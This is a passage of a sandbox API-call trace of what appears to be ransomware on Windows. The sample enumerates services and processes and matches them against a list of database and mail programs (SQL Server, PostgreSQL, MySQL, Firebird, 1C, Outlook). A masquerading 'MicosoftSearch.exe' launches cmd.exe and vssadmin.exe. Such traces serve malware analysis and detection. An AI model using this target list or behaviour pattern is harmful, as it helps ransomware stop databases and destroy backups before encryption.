(lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0041.619] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0041.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0041.619] lstrlenW (lpString="UxSms") returned 5 [0041.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0041.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0041.620] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0041.620] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0041.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0041.620] lstrlenW (lpString="VSS") returned 3 [0041.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0041.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0041.620] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0041.620] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0041.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0041.620] lstrlenW (lpString="WdiServiceHost") returned 14 [0041.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.620] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0041.620] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0041.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0041.620] lstrlenW (lpString="WdiSystemHost") returned 13 [0041.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.620] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0041.620] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0041.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0041.620] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0041.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.620] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0041.620] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0041.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0041.620] lstrlenW (lpString="Winmgmt") returned 7 [0041.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0041.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0041.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0041.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0041.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0041.621] lstrlenW (lpString="WPDBusEnum") returned 10 [0041.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.621] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0041.621] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0041.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0041.621] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0041.621] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0041.624] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0041.625] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0041.626] lstrlenW (lpString="System") returned 6 [0041.626] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0041.626] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0041.626] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0041.627] lstrlenW (lpString="smss.exe") returned 8 [0041.627] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0041.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0041.627] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.628] lstrlenW (lpString="csrss.exe") returned 9 [0041.628] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.628] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.628] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.628] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.628] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.628] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.628] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0041.628] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0041.629] lstrlenW (lpString="wininit.exe") returned 11 [0041.629] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0041.629] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0041.629] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0041.629] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.630] lstrlenW (lpString="csrss.exe") returned 9 [0041.630] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0041.631] lstrlenW (lpString="winlogon.exe") returned 12 [0041.631] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0041.632] lstrlenW (lpString="services.exe") returned 12 [0041.632] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0041.633] lstrlenW (lpString="lsass.exe") returned 9 [0041.633] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0041.634] lstrlenW (lpString="lsm.exe") returned 7 [0041.634] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.634] lstrlenW (lpString="svchost.exe") returned 11 [0041.634] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.635] lstrlenW (lpString="svchost.exe") returned 11 [0041.635] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.636] lstrlenW (lpString="svchost.exe") returned 11 [0041.636] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.637] lstrlenW (lpString="svchost.exe") returned 11 [0041.637] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.638] lstrlenW (lpString="svchost.exe") returned 11 [0041.638] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0041.639] lstrlenW (lpString="audiodg.exe") returned 11 [0041.639] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.640] lstrlenW (lpString="svchost.exe") returned 11 [0041.640] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.641] lstrlenW (lpString="svchost.exe") returned 11 [0041.641] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.642] lstrlenW (lpString="dwm.exe") returned 7 [0041.642] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.642] lstrlenW (lpString="explorer.exe") returned 12 [0041.642] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.643] lstrlenW (lpString="spoolsv.exe") returned 11 [0041.643] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.644] lstrlenW (lpString="taskhost.exe") returned 12 [0041.644] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.645] lstrlenW (lpString="svchost.exe") returned 11 [0041.645] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0041.646] lstrlenW (lpString="taskeng.exe") returned 11 [0041.646] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.647] lstrlenW (lpString="taskhost.exe") returned 12 [0041.647] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0041.939] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0041.939] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0041.940] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0041.940] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0041.941] lstrlenW (lpString="sa_shape.exe") returned 12 [0041.941] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0041.942] lstrlenW (lpString="confidence.exe") returned 14 [0041.942] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0041.943] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0041.943] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0041.944] lstrlenW (lpString="blue.exe") returned 8 [0041.944] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0041.945] lstrlenW (lpString="newly debut.exe") returned 15 [0041.945] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0041.946] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0041.946] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0041.947] lstrlenW (lpString="archive.exe") returned 11 [0041.947] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0041.947] lstrlenW (lpString="defend.exe") returned 10 [0041.948] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0041.948] lstrlenW (lpString="arservice.exe") returned 13 [0041.948] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0041.949] lstrlenW (lpString="rr-programmer.exe") returned 17 [0041.949] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0041.951] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0041.951] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0041.952] lstrlenW (lpString="twistedmonton.exe") returned 17 [0041.952] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0041.953] lstrlenW (lpString="arc plains.exe") returned 14 [0041.953] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0041.954] lstrlenW (lpString="americahousestip.exe") returned 20 [0041.954] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0041.954] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0041.954] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0041.955] lstrlenW (lpString="medical lectures.exe") returned 20 [0041.955] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0041.956] lstrlenW (lpString="electronic.exe") returned 14 [0041.956] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0041.957] lstrlenW (lpString="regression.exe") returned 14 [0041.957] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0041.958] lstrlenW (lpString="county.exe") returned 10 [0041.958] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0041.959] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0041.959] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0041.960] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0041.960] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0041.960] lstrlenW (lpString="cmd.exe") returned 7 [0041.961] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0041.961] lstrlenW (lpString="conhost.exe") returned 11 [0041.961] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0041.962] lstrlenW (lpString="vssadmin.exe") returned 12 [0041.962] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0041.963] lstrlenW (lpString="VSSVC.exe") returned 9 [0041.963] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.964] lstrlenW (lpString="svchost.exe") returned 11 [0041.964] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0041.965] CloseHandle (hObject=0x1bc) returned 1 [0042.157] Sleep (dwMilliseconds=0x1f4) [0042.925] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e28 [0042.926] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0042.926] GetLastError () returned 0xea [0042.927] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0042.927] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, 